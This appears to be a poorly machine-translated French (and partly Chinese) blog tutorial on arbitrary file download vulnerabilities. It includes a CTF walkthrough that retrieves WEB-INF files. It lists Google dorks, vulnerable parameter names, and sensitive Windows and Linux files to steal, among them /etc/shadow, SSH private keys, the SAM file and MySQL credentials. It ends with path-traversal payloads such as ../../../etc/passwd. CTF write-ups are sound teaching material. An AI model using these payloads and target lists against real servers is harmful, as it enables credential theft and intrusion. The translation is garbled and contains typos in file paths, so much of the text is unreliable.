Avant-propos:
Auparavant, eu des contacts avec cette connaissance, il y a juste cet examen d'une question cette connaissance, vous apprendrez en détail sur la vulnérabilité de téléchargement de fichier arbitraire
Télécharger les lacunes Profil
En raison des besoins des entreprises, de nombreux sites ont souvent besoin de fournir des documents (pièces jointes) blocs fonctionnels de téléchargement, mais si le fichier est téléchargé des restrictions ne télécharge pas directement leurs fichiers via le chemin absolu, l'utilisateur malveillant peut utiliser ce serveur à télécharger fichiers sensibles sur le serveur pour de nouvelles menaces et attaques.
Télécharger toute vulnérabilité des méfaits
En téléchargeant des fichiers, vous pouvez télécharger tout serveur de fichiers, le code spécifique de l'information de configuration de service Web et des systèmes de serveur, vous pouvez également télécharger des informations de configuration dans la base de données, ainsi que des informations de réseau interne pour détecter, et ainsi de suite.
En brièvement ci-dessus, nous pouvons voir toute la vulnérabilité de téléchargement est très commun, si les utilisateurs visualisent ou télécharger le fichier ne limite pas, mais elle pourrait être exploitée, causant des dommages, puis apprendre à télécharger soit la vulnérabilité utilisation.
Utilisez un téléchargement de vulnérabilité
existence
Liens du point de vue, semblable à ceux-ci, il est possible de télécharger des lacunes existent
download.php?path=
download.php?file=
down.php?file=
data.php?file=
readfile.php?file=
read.php?filename=
titre analytique
Ici pour faire une question à titre d'exemple
voir le code source et trouvé ce format, la spéculation peut télécharger un ou plusieurs fichiers contenant
ouvert et trouvé une page écrite en Java ,
nous pouvons alors si vous pouvez faire avec un téléchargement de vulnérabilité de cette approche, essayer, mais la chose étrange est que nous construisons tous les paramètres ne sont pas trouvés, le chef m'a dit que cette question a besoin de changer la méthode de requête pour le travail ou l'expérience des enseignants en profondeur
Entrée, vous pouvez vraiment trouver
filename=WEB-INF/web.xml
Il y a deux fichiers clés ont trouvé l'emplacement du drapeau, d'abord jeter un oeil àcom.wm.ctf.FlagController
filename=WEB-INF/classes/com/wm/ctf/FlagController.class
Trouvé une chaîne de base64, le décodage peut être dérivé drapeau
Cette question implique beaucoup de connaissances, regarder de plus près, il a dit:
Tout d'abord, nous voyons que cela est écrit dans les pages web java et répertoire WEB-INF de Java est la sécurité des applications WEB.
Le dossier WEB-INF en plus web.xml
, mais aussi garder un classes
dossier pour placer les *.class
fichiers, ces *.class
fichiers sont écrits dans le personnel de la bibliothèque de conception Web pour obtenir la jsp
séparation des services d'art de premier plan de la page et arrière - plan, fait l'entretien du site est très facile à utiliser. web.xml
descripteur de déploiement fichier fichier XML pour le site, le déploiement du site est très important.
Voilà pourquoi nous commençons à voir la directe WEB-INF/web.xml
cause de la
Synthétiserons WEB-INF ou commun de fichiers
/WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。
/WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中
/WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件
/WEB-INF/src/:源码目录,按照包名结构放置各个java文件。
/WEB-INF/database.properties:数据库配置文件
漏洞检测以及利用方法:通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码
Sachant cela, le problème ci-dessus est vraiment pas difficile, vous examinez simplement si une connaissance approfondie
Résumé de la vulnérabilité
Téléchargeons toutes les vulnérabilités peuvent être recherchés par Google
inurl : readfile.php?file=
inurl : download.php?file=
À partir du nom du paramètre point de vue, à peu près:
&readpath=
&filepath=
&Path=
&inputfile=
&url=
&Lang=
&dis=
&data=
&readfile=
&menu=
META-INF=
WEB-INF
Ces paramètres peuvent être des lacunes (bien sûr, de voir comment la protection latérale de gestion)
En résumé linux télécharger et utiliser les fichiers Windows
les fenêtres:
C:\boot.ini //查看系统版本
C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件
C:\Windows\repair\sam //存储系统初次安装的密码
C:\Program Files\mysql\my.ini //Mysql配置
C:\Program Files\mysql\data\mysql\user.MYD //Mysql root
C:\Windows\php.ini //php配置信息
C:\Windows\my.ini //Mysql配置信息
C:\Windows\win.ini //Windows系统的一个基本系统配置文件
linux
root/.ssh/authorized_keys////如需登录到远程主机,需要到.ssh目录下,新建authorized_keys文件,并将id_rsa.pub内容复制进去
/root/.ssh/id_rsa//ssh私钥,ssh公钥是id_rsa.pub
/root/.ssh/id_ras.keystore//记录每个访问计算机用户的公钥
/root/.ssh/known_hosts //记录每个访问计算机用户的公钥
/etc/passwd
/etc/shadow//账户密码文件
/etc/my.cnf //mysql配置文件
/etc/httpd/conf/httpd.conf //apache配置文件
/root/.bash_history //用户历史命令记录文件
/root/.mysql_history //mysql历史命令记录文件
/proc/mounts //记录系统挂载设备
/porc/config.gz //内核配置文件
/var/lib/mlocate/mlocate.db //全文件路径
/porc/self/cmdline //当前进程的cmdline参数
vérification de la vulnérabilité
xxx.php?f=../../../../../../etc/passwd
xxx.php?f=../index.php
xxx.php?f=file:///etc/passwd
Paramètre f valeurs de paramètres fichier PHP:
1.文件被解析,则是文件包含漏洞
2.显示源代码,则是文件查看漏洞
3.提示下载,则是文件下载漏洞
Divers chemin du fichier
et enfin fournir un résumé des ressources Gangster
résumé
Trop de nourriture, une bonne école, l'écriture suivante est pas très détaillée, allez à gauche pour voir qwzf Blog Gangster